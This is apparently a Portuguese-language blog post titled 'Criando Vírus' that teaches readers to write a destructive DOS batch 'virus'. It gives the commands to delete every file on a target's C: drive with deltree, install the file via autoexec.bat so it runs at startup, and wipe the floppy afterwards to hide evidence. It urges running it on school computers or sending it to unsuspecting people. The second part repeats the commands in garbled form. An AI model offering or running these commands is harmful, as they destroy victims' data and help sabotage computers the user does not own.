Criando Virus

Criando Vírus Parte I

Em primeiro lugar, você deve abrir o MS-DOS e seguir os passos abaixo:
Digite: Edit (nome do seu arquivo).bat, deverá aparecer uma tela azul.

Entre com os comandos: @ECHO OFF e BREAK OFF. A página deverá ficar da

seguinte maneira, como está embaixo:

@ECHO OFF
BREAK OFF


Depois disso, a pessoa escolhe o que seu vírus deve fazer. Depois ela usa o comando copy a:\(nome do seu vírus).bat autoexec.bat, ela então terá a certeza de estar executando seu vírus ao iniciar o computador-alvo. Agora vamos supor que o seu vírus seja capaz de apagar todos os arquivos do PC alheio. Você deve usar o seguinte

comando:

deltree/y c:\*.*

Agora, o vírus simples da pessoa está completo. É só a vítima (seu amiguinho) executar o arquivo e pronto!

Importante:

Caso a pessoa passe esse vírus via disquete, ele não deve esqueçer de finalizar o arquivo com o comando deltree/y a:\*.*. Isso serve para não deixar vestígios de seu ato insano.

Criando Vírus Parte II

Para fazer um virus existem muitas plataformas e varios tipos de virus existe virus tipo *.bat *.exe *.mid *.sis *.dll *.etc... tem de todas as formas que vc possa imaginar para criar um virus do tipo melissa ou I love You não basta 5 minutos e im semanas ou até meses para adicionar suas configuraçoes e o que ele ira causar as vitimas como se espalhar pelo computador ou se camuflar em outros executaveis ou até mesmo no momento se espalhar por toda sua lista de contato e enviar varias copias dele mesmo para e-mails de amigos e qualquer pessoa que estiver na sua lista de contato.
Os virus mais fracos os chamados *.bat ou mais conhecidos como virus batch são criados em minutos basta ter a formula isso vc encontra no nosso link Virus.BAT vc pega uma formula seja de um virus pra excluir windows ou para enviar erros ao modem tanto faz sempre quando vc mesmo criar uj batch nunca eu falei NUNCA rode ele no seu propio HD para ver se funciona ou não prefira sempre os micros da escola ou mande para algum lamer ( ou como preferir LAMMER ou COBRA )
COBRA = Pessoa da internet que não sabe exatamente nada akele que rasteja e ainda leva pancada.
Quer editar seu virus *.bat agora ? então vamos lá clique no menu iniciar vá até programas em seguida aponte para acessórios e abrao arquivo NotePad ou WordPad lá vc digita isso exatamente como esta aqui :

@ECHO OFF
@BREAK OFF
deltree/C: Y\*.*

A: nome do virus.bat autoexec.bat

Em seguida salve esse arquivo assim : Nome do virus.bat

Pronto agora vc tem um virus .bat no seu propio micro nossa! que emoção não sei se vou conseguir digitar mais ( chega de brincadeira )

Agora de maneira nenhuma mesmo se desconfiarque esse virus está errado não abra esse arquivo então é só isso vc agora já tem mais ou menos uma noção do que é um virus.bat e um .exe

0 comentários:

OnSelectstart="return false" OnContextMenu="return false"
OnSelectstart="return false" OnContextMenu="return false" OnSelectstart="return false" OnContextMenu="return false"